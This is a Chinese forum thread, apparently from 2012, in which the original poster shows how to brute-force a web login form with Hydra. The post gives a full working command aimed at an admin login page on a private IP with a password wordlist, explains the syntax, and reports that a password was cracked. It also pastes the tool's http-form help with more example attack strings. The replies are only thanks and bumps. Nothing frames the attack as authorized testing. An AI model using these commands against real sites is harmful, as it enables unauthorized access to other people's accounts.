查看: 2345|回复: 25

使用hydra破解网络登录密码

[复制链接]
发表于 2012-12-1 05:42:57 | 显示全部楼层 |阅读模式
这里说的是 post 类型的。。

[root@fedora ~]# hydra -f -l sincoder -P /root/1.txt -V -s 9900 192.168.7.122 http-post-form "/admin/index.php?action=login:user=^USER^&pw=^PASS^:<title>登录</title>"

主要看后面 。。

/index.php ..这个是登录的 url

后门是POST的数据 其中的用户名密码使用 ^USER^ ^PASS^ 来代替

然后是如果登录出错 会出现的字符 。。。

然后开始破解吧

这里破出来了。。



详细的解释

[root@fedora ~]# hydra -U http-form
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-11-25 19:25:02

Help for module http-form:
============================================================================
Module http-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
with usernames and passwords being replaced in the "^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by "F=", successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri     to define a different page to gather initial cookies from
H=My-Hdr: foo   to send a user defined HTTP header with each request
Examples:
"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect"
"/login.php:user=^USER^&pass=^PASS^&mid=123:S=authlog=.*success"
"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
"/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"
"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domC^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
[root@fedora ~]#
[/td][/tr]
[/table]
发表于 2012-12-9 00:12:10 | 显示全部楼层
貌似我真的很笨????哎  
发表于 2012-12-14 16:00:49 | 显示全部楼层
这个贴不错!!!!!看了之后就要回复贴子,呵呵  
发表于 2012-12-15 15:49:44 | 显示全部楼层
谢谢分享了!  
发表于 2012-12-15 21:46:21 | 显示全部楼层
应该加分  
发表于 2014-11-17 02:35:43 | 显示全部楼层
顶你一下,好贴要顶!  
发表于 2014-12-4 15:39:57 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-12-27 17:29:44 | 显示全部楼层
昨晚多几分钟的准备,今天少几小时的麻烦。  
发表于 2015-1-27 15:57:01 | 显示全部楼层
自己知道了  
发表于 2015-3-1 13:18:28 | 显示全部楼层
围观来了哦  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则